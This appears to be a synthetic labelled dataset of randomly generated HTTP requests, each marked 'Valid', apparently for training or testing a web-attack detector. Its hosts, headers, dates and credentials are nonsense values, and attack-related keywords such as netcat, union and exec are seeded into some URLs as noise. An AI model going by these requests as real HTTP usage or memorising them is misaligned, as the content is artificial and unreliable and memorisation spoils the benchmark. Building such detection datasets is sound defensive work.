Accept-Language: hrnwsaao-sebsfz, 7nrtN-ynn8c;q=0.0, st-caova9t6;q=0.9
Cache-Control: no-transform
Client-ip: 123.99.49.204
Cookie: ttewestpo2t=5ahrn;iei=h;sshyraawjqxtxwj=a;iiuHl6huud=98
Cookie2: $Version="334"
Date: Sun, 06 Dec 09 13:19:40 CET
ETag: "bLtJSDjv0-u90ifZ"
Expect: 100-continue
From: ertro@3cIlsoRsD5.cz
If-Modified-Since: Fri, 12 Jun 09 11:54:47 CET
If-Unmodified-Since: Sun, 25 Jan 04 20:32:32 GMT
If-Match: "FGlpgEhW130b6MAjZN8"
If-None-Match: *
If-Range: Sat, 18 Jul 09 12:31:12 UTC
Max-Forwards: 69
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: aaebq iit8t=dRtuh
Range: -34878,6878-7,3101-
Referer: http://ijrE.uk/hEaeonfo/trrdeeb9/soen/yn2s.mpg
TE: trailers,deflate,deflate;q=0.7
Trailer: Referer
User-Agent: irOt7ctvmi (iel0qvUz4)
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7934x883
Via: 6.2 www.zomd.css
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: aaeza/3.0
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 12566826495921
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31367
Start - Id: 34650
class: Valid
POST /7Jc2-sAkxsG/tlocation/f1ns/nGYKb8/5sgv/an4my/r9jrrfl03seoneaejl/iew3qoakeau7ddtdm/7ngMryxoIaUR/wNnaC-czH5C/gdvveoHto.jpg? HTTP/1.1
Content-Length: 17
Content-Language: nlrfrsp
Content-Encoding: compress
Content-Location: http://fvcett.ch/oHpgtp/tyweao/iebi/ctyLr/pamiap.png
Content-MD5: ZXU4NnJrdW9FZmk2cklxcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 17:04:47 CET
Last-Modified: Tue, 14 Sep 04 03:36:45 CET
Host: www.lonMet4.be
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1251;q=0.4, x-mac-chinesesimp;q=0.8, x-mac-roman
Accept-Encoding: compress;q=0.3
Accept-Language: tara-ecimur;q=0.0, rdz-aem3i;q=0.8
Cache-Control: no-cache
Client-ip: 67.93.72.22
Cookie: tuNe=02
Cookie2: $Version="2"
Date: Tue, 16 Dec 08 24:14:02 CET
ETag: "qe_7hAVu7Wn2tFiI"
Expect: 100-continue
From: a0ehHLe@uoneoi1.gov
If-Modified-Since: Thu, 02 Feb 06 04:59:50 UTC
If-Unmodified-Since: Wed, 31 Oct 07 05:10:57 GMT
If-Match: *
If-None-Match: *
If-Range: "VQcB07P-yN5GEGI"
Max-Forwards: 687
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Digest username="eemhmowa"
Range: -92449,63-97080,49-2
Referer: http://www.e3alHn.be/eiteeie9/sttQ5one.mpg
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 7.4; 6u-ei; rv:9.7.5) Gecko/78265119
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3397x406
Via: 9.8 www.oonse.png, 5.0 116.174.190.189
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 29825760
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dDc=?etbh?gnt

End - Id: 34650
Start - Id: 28087
class: Valid
GET /lwttaogjepmeo/th6sbhsdAkep/4wvgamoehr5h/oHbg/tdNat/e3/a0drihoao.php3?dn8nPi=%3C1eiu&onoN=tf%3A&ro4sseshdFpe3s=1576124&A5f1bNss=hMWWSIaL&Ltn9u5on=tmtTwl%40%2Fe%2Bwcdelete%24+rdci&gcninTxor2=inoe&atTo6Orett=uT6&hhn9toctbzhlA=eis%28childUgankE&r6=EenI0mTnvotisO9sns&seeua=mahd%5C%3D%3Cusrlikehome&Buoc.R=6ipv&tmitnolqpgb1hx=etalntmc HTTP/1.0
Host: www.rsDeaxe.uk:4
Connection: oekcfle
Accept: */*
Accept-Charset: euc-jp, isiri-3342;q=0.2, iso-8859-3
Accept-Encoding: gzip, deflate
Accept-Language: sTzya-ewh, egsrae-n0aeHle;q=0.4, 66ycmad-5apsDd
Cache-Control: ist=riEd7lte
Client-ip: 221.222.128.150
Cookie: tTeei1acsv=t=ke3l2tei+ai;ce5uaoos=1631150;Vseekenh3eld=28971;irDwn=@uya;6aisnhcS=Gf9hcq
Cookie2: $Version="91"
Date: Sat, 11 Jul 09 13:03:48 CET
ETag: W/"XUfnP3E3zKGKY_kZ_"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Sun, 09 Apr 06 12:48:38 GMT
If-Unmodified-Since: Thu, 01 Dec 05 18:07:39 CET
If-Match: "rszNKv51yLA65LC"
If-None-Match: *
If-Range: "rm6fujgYs1Y2tIc"
Max-Forwards: 0107
MIME-Version: 0.9
Pragma: rUmsr='rnrbei'
Proxy-Authorization: NTLM eW56c2VhaUJIZG1vaWV2V250TjRoYnRxaVVBdG50cmt3Z29hejNJZW5hYTQ=
Authorization: Digest response="3BFbE706e207dFCd0A089aC7dCcB05b8"
Range: -0194
Referer: http://tstevi3n.org/nrgdawH/theh/1edg/LinC.cfm
TE: deflate,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 2.2; ve-cs; rv:6.0.4) Gecko/67989500
UA-CPU: MIPS
UA-Disp: 5267,7369,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 682x3357
Via: 6.5 223.55.221.226, 1.4 220.203.151.202
Transfer-Encoding: identity
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 585 www.081x.html "mItb" "Sat, 28 Jan 06 07:00:52 GMT"
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 099741849448818150
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28087
Start - Id: 33423
class: Valid
PUT /r1U5VIokX6/zcqeuw/ere1ixUwb/nQjb8.cgi? HTTP/1.0
Content-Length: 106
Content-Language: l1ib0x,t
Content-Encoding: identity
Content-Location: /eqsgiaue/sbtrhi1d/cuscxlsn.png
Content-MD5: cHNic3JzYWhpbjRzbzRiaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Jun 04 20:39:18 CET
Last-Modified: Fri, 29 Jun 07 16:24:03 CET
Host: www.tmeundt9o.org:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: uuw-cR, ddnn-sreLu6se, rry-Boehl;q=0.5
Cache-Control: D9xrc0tp='ureh2he1'
Client-ip: 176.30.127.43
Cookie: efatss= eotkrr3w&hl\8=
Cookie2: $Version="2"
Date: Mon, 27 Mar 06 12:10:33 UTC
ETag: W/"2Sir._prP3L5s@44"
Expect: uqEhtnEl
From: airohua@gtscArwrS.org
If-Modified-Since: Sat, 05 Jan 08 01:26:11 GMT
If-Unmodified-Since: Sat, 03 Jul 04 02:44:12 CET
If-Match: *
If-None-Match: *
If-Range: "7xmJkT_ikb9I2OlfErO"
Max-Forwards: 29
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic RzRoZHJpbjpncHNuNGllNQ==
Authorization: NTLM ZmFtYXZuNDBpZWhvOG84ZUVwZE00YXNzdTh3ZEVlZXdUb3Ryb2g=
Range: -45727
Referer: /ache/rsoe1Bt.dll
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.0 (compatible; ssele2fefe; Linux i386; eiaTlhrdrc; trapRsFnu)
UA-CPU: PowerPC
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: FTP/3.4 www.lnau.png
Transfer-Encoding: compress
Upgrade: 6tibl/7.4, ite/8.5
Warning: 293 182.183.228.1 "tleicervnM3ra" "Mon, 29 Dec 08 19:13:38 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

tNd6t=znEr?tuo&cheett2i0og=h&vCHY7iE=ad&t1etavgid1rEieZ=tedeletestylesc-2d&Eoyi4Troon2onw=oG|\l4p>

End - Id: 33423
Start - Id: 781
class: Valid
GET /4cN6rJH8DJ9c/nRfh8ot/aihbestdhb6alpNs/uDL5RKixbKM/mcnwsAmmohun/gttEvumretaehttr/OVNzDu/e2vehhehsmkcrdsi.asp? HTTP/1.0
Host: www.ry0eneeob.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=1
Client-ip: 255.154.164.96
Cookie: madartcdrCRc=dP@.7nQUg@Rf;I32xrmfC=2454;eiaC=45041470;r9oz=euuhbankrsighPiil;teydW=orEQso0reT
Cookie2: $Version="334"
Date: Fri, 26 Oct 07 16:35:20 CET
ETag: "7_6P9KmfYe1-NL0"
Expect: cbNrl2ae=tlne
From: oxndn@a7opriy.uk
If-Modified-Since: Sat, 25 Feb 06 01:15:01 CET
If-Unmodified-Since: Wed, 27 Jun 07 24:23:24 UTC
If-Match: "fXBFb-F-i7sV5w0wft"
If-None-Match: "06mhv5jfZ4j--ok.Jk"
If-Range: *
Max-Forwards: 931
MIME-Version: 0.6
Pragma: sue='w'
Proxy-Authorization: Digest opaque="peradza"
Authorization: Basic c3FpeXVsaHQ6YWZheXByb3k=
Range: -0,-25426
Referer: /tqgH/ipYlaHkw/nddeOso/afpo1sn.tar.gz
TE: gzip;q=0.7,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ejmtthuo
UA-CPU: PowerPC
UA-Disp: 160,1474,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 260x3490
Via: 7.5 127.211.248.165:60, FTP/1.0 152.1.65.80:755
Transfer-Encoding: Tmxa; ucaroas=owtst
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 393 16.23.206.208 "aeeyywi82NiChtaec" 
X-Forwarded-For: 69.243.92.99
X-Serial-Number: 40823
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 781
Start - Id: 29320
class: Valid
GET /styleHJ0Br5poptiESwP/heUjmWty/msdg9esi/wkceeiateeofcopuese/e.yvUVRJ/MRLHinputzZc9h/nNTegt1d5/s3ZM/eEEKn5IWmsK./o4_2/ePy.png? HTTP/1.0
Host: 31.97.74.96
Connection: dtiet
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic;q=0.3, isiri-3342
Accept-Encoding: deflate
Accept-Language: teno-xa;q=0.7, 0ddntip-wtsIs5gf;q=0.5, s1ega-ag4ec5rs, brUst-ttrm;q=0.9
Cache-Control: no-transform
Client-ip: 40.215.82.233
Cookie: 3houoral30sgmte=0hopp;aiheOnl=76782;l.@0=wmaxo98e)Traxeoabody+rcp;La=l sne;KGiRPM=6397;nneOp=97
Cookie2: $Version="68"
Date: Sun, 11 Oct 09 12:27:50 CET
ETag: W/"VfzgGlVjUREW052N"
Expect: r4ncne
From: yttt5iy@rcto.com
If-Modified-Since: Wed, 17 Mar 04 02:50:16 GMT
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: *
If-None-Match: "Ae6gyGKyPd6fw90"
If-Range: "G5ePmjC3lCt7sTr84"
Max-Forwards: 372
MIME-Version: 0.7
Pragma: jb7ys=30t
Proxy-Authorization: NTLM aGdmeUVjdG1SZHRpNXRldWVhbm11b2NoN3JuaXRjdXVyZW9l
Authorization: Basic U2FpYXM6ZWFlcXFxcmE=
Range: 00-
Referer: http://LsqMk.uk/Heeiaer/neaae.tar.gz
TE: trailers,chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Nmxrepetelio
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 553x667
Via: 3.1 137.133.136.171, HTTP/1.8 www.nnhezaa.css
Transfer-Encoding: deflate
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 784 254.111.98.187 "oOa4tmsi" 
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29320
Start - Id: 17977
class: Valid
GET /vN.3RF5JVbJy4O..js?90asserknosmi9d=d7frkaa5j&AqQnhmokdkjoc=p9ebo&tnEr=7653 HTTP/1.1
Host: www.ssNeothoa.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 74.54.93.81
Cookie: hhpzivitae=208854;.9VYhyX_mOD=lalaeiuoush1urAnr
Cookie2: $Version="07"
Date: Fri, 05 Feb 10 18:04:00 CET
ETag: W/"v_bZgiUX_t931JyZ"
Expect: aereoiar=ndite
From: 3lhked@reen2i5.fr
If-Modified-Since: Tue, 09 Oct 07 24:13:07 CET
If-Unmodified-Since: Wed, 09 Jul 08 20:32:06 UTC
If-Match: *
If-None-Match: "b9Q8lzeMDefalxOMi"
If-Range: "wqoXKCII96Hf0mTO"
Max-Forwards: 19
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM bmRybWhobmVhbjluTkFhZWhzaGFlclRTV2V1bzV1Y245RTNhYnJoYU1yMG8=
Authorization: Digest cnonce="eoLo8"
Range: 8-
Referer: /lid8Iv/bgoafN.js
TE: trailers,trailers,deflate
Trailer: User-Agent
User-Agent: s-hHWNk http://www.butaiy.uk
UA-CPU: Sparc
UA-Disp: 5395,1752,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 642x5791
Via: 4.4 www.hdlz.htm
Transfer-Encoding: gzip
Upgrade: d1n/9.1, lilPin/5.5, xYN/4.8, yeNdly/0.6
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 52.173.140.208
X-Serial-Number: 861347769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17977
Start - Id: 23242
class: Valid
GET /an/Shoceiirt/elLk/eesh8if/tlftlcama.htm?m8yaieyoicesiar=08544284&@yu.3hOJs=69&s0ou=r-J%40gSA&axz2jeon=23055&sxRJf=E5aia&hM=74&adji7lneryi3rZ=mn&4s=Dnyoo5em6htlcnca HTTP/1.1
Host: www.aniiaElt.gov
Connection: keep-alive
Accept: image/*;q=0.5, audio/basic;q=0.1, image/png;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, gzip, deflate;q=0.7, identity;q=0.1, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 138.156.42.202
Cookie: srool5Dt1iot=desimgh;4ndehg6rejethe=ltenc:=dvhttfePar;uNtsksc9nci=acceptyks
Cookie2: $Version="5"
Date: Sat, 28 Apr 07 19:00:22 UTC
ETag: "Y1KV1ibzvGiIj2AYz.A"
Expect: aaaige=TmCl9
From: sebe@tnldorehze.de
If-Modified-Since: Tue, 27 Jun 06 08:52:49 UTC
If-Unmodified-Since: Fri, 07 Dec 07 07:02:49 CET
If-Match: *
If-None-Match: "uu4B3WM0UX3ehb9EW"
If-Range: Mon, 25 Apr 05 11:01:10 GMT
Max-Forwards: 5784
MIME-Version: 8.2
Pragma: eorT1=oia
Proxy-Authorization: dxJs etmod=s7sntn
Authorization: aHpk mrhla=ysgate5a
Range: 40-66,-706
Referer: http://pnsFtdjq.biz/eHegon8n/ydpol0e.asmx
TE: chunked;q=0.8,chunked;q=0.8,deflate;q=0.6
Trailer: Referer
User-Agent: tsdtucvetluhum
UA-CPU: StrongARM
UA-Disp: 070,0093,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: HTTP/5.3 www.noab.htm, 7.6 247.146.111.215, 4.9 104.172.66.133
Transfer-Encoding: gzip
Upgrade: lhdsEe/5.9, eiyn/0.7, ajfots/4.0
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 231.110.49.145
X-Serial-Number: 045569580616206660
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23242
Start - Id: 15430
class: Valid
GET /LnczbBVmetaO/hE3AA7/eyEeeAj/a2vYwZ0.PVx/x@kw0o/Pv9xzhbJhmxml1/YBinWP@NEG.Cm48/4unklme/snaRtUm/hso1ktpbute1atc3fEof/kjteeolb6NsieQdn.html?rhEr=-be&GOvv3_tmpo_include=xmC&4qqEZmvbscriptMN=%5Bre&ywovxsp=w%40WjAs7vC60&ent=e+eAee&oLAfu5eree6Gsa=21244&rimiti1=478737130&snih4MrDaslCeoe=08083995&otao1ea=h_DZ52Df22 HTTP/1.0
Host: www.oteoso.cz
Connection: tpet3g
Accept: text/xml;q=0.7
Accept-Charset: windows-1258, iso-2022-jp, x-mac-arabic, iso-8859-8;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 11.111.91.249
Cookie: nlcrl=script;9hsy9edti=:a
Cookie2: $Version="494"
Date: Wed, 06 Jan 10 09:24:17 UTC
ETag: "ijZfXIVIswPt3dqDr"
Expect: o00to=jrir5a;telilZd
From: hreEo@mhtthLrava.org
If-Modified-Since: Sun, 31 Aug 08 02:54:03 CET
If-Unmodified-Since: Fri, 26 Sep 08 16:28:14 CET
If-Match: ".xT4_p8NFyab_Ywg@zA1"
If-None-Match: *
If-Range: "HjtHlmiQS3X7bbnlBN4n"
Max-Forwards: 6
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://eoSaio.ch/paao9/eapN/amw5eew/aeif8h.sh
Authorization: Basic Y2Z0eUlsOmVhbjdlYQ==
Range: -590219
Referer: http://lnhSefu.de/7ikoeho/etaahar/sqepme/ontrao/6abg.exe
TE: trailers,trailers
Trailer: If-Match
User-Agent: smacO/6.1.4
UA-CPU: x86
UA-Disp: 842,1582,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8272x2964
Via: 3.7 234.202.142.219:322, 5.8 164.29.163.186:0, 2.1 www.snrofka.shtml
Transfer-Encoding: deflate
Upgrade: ncaer/8.0, rbkq/6.1, eos/1.0, ckiws/1.2, 6ln76s/2.0
Warning: 680 177.253.57.76 "nFrmsteeL" 
X-Forwarded-For: 42.110.19.254
X-Serial-Number: 39984
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15430
Start - Id: 14146
class: Valid
GET /nprB/iiu/lqwleolgicd/mprgohi8gfNhwoei1ba/oCx5scriptIwIhiJf.php3?rin=%24rtorc&rhasbtrPe4=rj.UDYJUGq&ns7Xwr=5265&ueseis9tea=qvdtr%3Aet&cIxO8msl4=948180&7hhe8Stx=b5r%3DandoOE&0netcatVR26Wvn2union=29&9a9bxteheKr=a5fwsneg0I&Nevalhtpassni@hHQ=2227344&ehffitnEcoe=teaeeTmilq&tjiydnysrng5pq=jUQDGv&m3eltA=3431497 HTTP/1.1
Host: www.1w6par4.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, identity
Accept-Language: hyiu-tntOhc;q=0.2, rhres7-Q;q=0.1, my-jtntouoO, o-hin;q=0.8, iH3sf-yhnjAd
Cache-Control: only-if-cached
Client-ip: 184.141.210.48
Cookie: ya=385622;swo80vtnafyd5iq=iWs6qJIc;nobgsoundUT=488787;ldsAfd2iao8=27;COPCZJo-=228961;ptisdurle7oIh=768509
Cookie2: $Version="66"
Date: Fri, 29 May 09 18:01:52 GMT
ETag: "UEVmFw97@yrz7UMGZmRF"
Expect: 100-continue
From: zess@lSzAtt.de
If-Modified-Since: Wed, 28 Jul 04 15:19:37 GMT
If-Unmodified-Since: Sat, 15 Apr 06 16:31:21 CET
If-Match: *
If-None-Match: "P2t@rE929SH.X.er"
If-Range: "0GccrP6vqM4kgtKYv9"
Max-Forwards: 84
MIME-Version: 9.0
Pragma: 4ifee=uo84tria
Proxy-Authorization: Basic TGJyc3I6N281ZTRycw==
Authorization: Digest uri=http://rgrhd.gov/alsc.php3
Range: 3-054091,-769,-18
Referer: /ec2w/siextap.pdf
TE: trailers,chunked,gzip
Trailer: Trailer
User-Agent: Mozilla/0.0 (X11; U; Unix 8.2; th-a4; rv:6.1.8) Gecko/73241681
UA-CPU: x86
UA-Disp: 946,473,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5343x014
Via: 1.9 www.hyr7.png:2994, FTP/8.2 61.211.238.111
Transfer-Encoding: deflate
Upgrade: e2es/4.2, i4o/1.0, H5unol/4.6, puffs/2.0
Warning: 703 www.aish.jpg:056 "tnet" "Sat, 28 Jan 06 13:17:48 UTC"
X-Forwarded-For: 143.221.88.228
X-Serial-Number: 10475
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14146
Start - Id: 24250
class: Valid
GET /u.ajyjMGR_-aS/tEqLqkBA/waGgJ4SUhAVqqNeHVQv/d2qtefi/unz/CfVRxbinotelnetlHY_/zKWxyJ-9r69Zj-p/jMkC1cqmetah/wig5iacgc/nb0A0OhZ51ivwGh@hzz/tsxaChe.cfm?nA8f6lcrtecD=pRinputwinntS&tN-T=409299&oee=ic%25a+%3Ani8q&SNr5cakaeiw=5ddU_Eb&8jrldsre0he=0&ttlwRtrtsimdE=u&IkOchildxagrs1V=eiw&nwae9cctPa=q4fjz HTTP/1.1
Host: 111.242.50.106
Connection: npraexc
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip;q=0.4, gzip;q=0.5, identity;q=0.2, identity;q=0.8
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 196.189.89.236
Cookie: ito8godol5bonc=tfeg;Fyatg4at=114264;gwe=lcte
Cookie2: $Version="49"
Date: Sat, 09 Sep 06 07:56:05 GMT
ETag: W/"axYUtLRByGPdOzB"
Expect: 100-continue
From: azat@edspS.uk
If-Modified-Since: Tue, 26 Dec 06 06:45:44 UTC
If-Unmodified-Since: Wed, 15 Jun 05 14:33:35 UTC
If-Match: "nuYhQD@@dgrmCn6F96RE"
If-None-Match: "nP_Bkpw1VaBp.Dam_"
If-Range: "j5yCkbNyBTF@cYP2"
Max-Forwards: 506
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: praul1 nnstat=aopbsid
Authorization: NTLM bG42NnlwbnNhZHJzb24xZ2JlaWJuZW4wOWU4cmNsdEh0bGUzRXJsdDBpQ3RwcG5z
Range: 8342-,-03829
Referer: /asdi/ndn8/ayddjita/eaalu.php3
TE: chunked,deflate;q=0.2
Trailer: Accept-Charset
User-Agent: qersnb/9.6.9.6.5
UA-CPU: StrongARM
UA-Disp: 565,7828,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 982x566
Via: 2.5 www.eoum.js, 9.2 www.apvsDihd.jpeg
Transfer-Encoding: deflate
Upgrade: nmsBw/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 44824907653984
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24250
Start - Id: 7272
class: Valid
POST /ooP5mDC@./dsenm7Aeh/tXhifa9sf2bdw7zZ8t/fy/oiorksawi/tstsnooxn/4rfolpodhE4hneoi/eaeheo/dtvuuA/izTTXQUjVaZaoClNZDUB.shtml? HTTP/1.0
Content-Length: 122
Content-Language: hu0ee,Dk
Content-Encoding: deflate
Content-Location: http://www.uA4Ec1d.be/vlats/tTaeolse/5ntdm/rettpowm/qmud.swf
Content-MD5: bE90aHRuUXR0ZWlTb2ZkcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Feb 09 05:15:19 UTC
Last-Modified: Tue, 11 Aug 09 22:03:29 GMT
Host: www.uoe8ea.cz:699
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew, windows-1250;q=0.7, windows-1254;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: pthelCco-ze0a, i4mrra-on;q=0.7, cass3emg-rdi3rra, iofhef-tE;q=0.5
Cache-Control: no-cache
Client-ip: 215.219.225.123
Cookie: fji=3959
Cookie2: $Version="42"
Date: Tue, 06 Nov 07 07:57:37 CET
ETag: "naed@aC1KX@cN4y259"
Expect: iihb9M
From: gm0jsa@ehox0yd.cz
If-Modified-Since: Mon, 15 Jun 09 07:25:51 GMT
If-Unmodified-Since: Fri, 22 Apr 05 13:45:47 UTC
If-Match: "IVC.Y@6SJQOim8NeY1E"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.8
Pragma: p7pse=so
Proxy-Authorization: ntsAjG eRoonit=huowas9
Authorization: Basic ZWhvYTplaTBvaGdzcg==
Range: -397
Referer: /isB4enl/etSab/hwr7.bin
TE: trailers
Trailer: If-Modified-Since
User-Agent: cygOmJB9M http://www.osod.st
UA-CPU: StrongARM
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 631x5242
Via: trna/2.0 www.weokimgs.gif, 7wf/8.7 www.oinervz.css
Transfer-Encoding: srnir7; s0ay=I1s7ett
Upgrade: Bthj/0.7, oilV/9.4, Dese/6.1
Warning: 186 www.gmebs.png "esStnnrsoitbtaiej" "Mon, 02 Apr 07 11:43:42 GMT"
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8idTi=99861387&se0hnislkIl=tKy6&3Tsozenldhr3f=55&e6lahaehs=|we&r&tim=spa&teehl4eendg=a3Lua&ab0=bodyitc&6eBo=gVvqE-HvaN

End - Id: 7272
Start - Id: 3727
class: Valid
GET /oPrscripto.ajXFUqe.php4?odocumentAshutdownFlXsock_streamB=enntceopt6&from91ZZ=D%3E2e&Tuleceohctounl=h%29f%25&s4a=7meeme&Dirnehoyosaa=lu&UneundoBaattEu=s&oshbAhA=%3B%24u6nodv%3FsJ%24%7C&formSal=42099690&p6=2BQa2S HTTP/1.0
Host: 217.152.202.22:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1251, windows-1250;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 87.85.120.176
Cookie: ulb=0hme&5Nperl\ ba7ihr wte;Iepn=ea8n]
Cookie2: $Version="8"
Date: Fri, 15 Dec 06 04:14:19 CET
ETag: W/"iM8.PijE4f7dmDjpg4I"
Expect: hMaThnb=iqaoes
From: bTuG@sunaTo.gov
If-Modified-Since: Thu, 19 Aug 04 01:14:06 GMT
If-Unmodified-Since: Wed, 21 Nov 07 07:00:42 GMT
If-Match: *
If-None-Match: *
If-Range: "Mu.y8uQjv6iLJn8H"
Max-Forwards: 0385
MIME-Version: 0.4
Pragma: id8seao=p
Proxy-Authorization: Nsot sthssEoE=ooht9
Authorization: Irlntq dein60n=oh1nhz
Range: 3009-,7606-,452153-40751
Referer: http://www.teygj4dw.org/sluObrer/iixBd/eNEet5/nnri6P/rw44ro.swf
TE: trailers,trailers,gzip
Trailer: Expect
User-Agent: tfrconNa74
UA-CPU: PowerPC
UA-Disp: 7385,2023,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0475x7705
Via: FTP/6.9 www.enip1e.tiff, 2.8 www.65d2xj.png, 3.4 www.cmgi.css
Transfer-Encoding: deflate
Upgrade: gsllay/9.9, kj6hn/8.2
Warning: 836 116.134.212.111 "a0znr0igtS" "Fri, 24 Sep 04 03:35:09 GMT"
X-Forwarded-For: 95.113.101.82
X-Serial-Number: 68867877
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3727
Start - Id: 22579
class: Valid
GET /nYAFJX@9XAnzp.QnL.eP/pqcw@7dOSNnFUD/1eduUteinmlgh/a7.tiff?r26b13td=oLvTD_e2wJWR&elGw=ilx&tlh=a+&oAeMmoaxeUe=es+aizrsm%3Cpie%24h&e7lsbzuedrltsMe=42406144&mo=yrBquvA7%40crk&eeeenpswsjnhtmp=wlAmaeotd%26zkxp_&TKto=Thexec&nms5e0mTzb2drH=9&1vtebs5jSlDah=fhc&sdees=114346&cievi=683326&ewhe1Snbnrop=eq9+&sHen=92 HTTP/1.1
Host: www.i1Hst.com:1
Connection: ewjnslWh
Accept: audio/*, application/zip, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 14.142.132.191
